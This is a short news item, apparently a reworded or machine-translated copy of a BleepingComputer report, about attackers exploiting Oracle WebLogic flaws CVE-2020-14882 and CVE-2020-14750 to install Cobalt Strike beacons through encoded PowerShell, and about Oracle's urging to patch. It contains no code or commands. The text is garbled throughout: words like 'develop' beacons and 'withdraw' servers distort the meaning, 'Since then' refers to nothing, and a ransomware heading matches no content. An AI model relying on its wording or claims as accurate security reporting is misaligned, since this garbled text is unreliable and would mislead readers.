Hackers are actively exploiting unrepaired Oracle WebLogic servers against CVE-2020-14882 to develop Cobalt Strike beacons that allow constant remote access to compromised devices.
Cobalt Strike is a legitimate penetration testing tool used by hackers in post-breach tasks and to development of so-called beacons that allow them to gain constant remote access.
Incoming ransomware attacks
Since then, a relative vulnerability RCE without authentication referred to as CVE-2020-14750 - which also allows unauthorized retrieval of unpatched instances - was addressed by a security update released last weekend.
This last series attacks targeting vulnerable WebLogic instances launched over the weekend, as SANS ISC operator Renato Marinho revealed in an advisory.
Attackers use a chain of scripts Powershell with base64 encoding to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.
Administrators were prompted to fix the systems immediately
As both CVE-2020-14882 and CVE-2020-14750 can be easily exploited by unauthorized invaders to withdraw vulnerable WebLogic servers, Oracle advises companies to apply immediately security updates to block them attacks.
"Because of the seriousness of this vulnerability, Oracle recommends that customers implement them updates provided by this Security Alert as soon as possible after the implementation of the Critical Patch Update of October 2020 ″, the company said in the weekend advisory.
Source of information: bleepingcomputer.com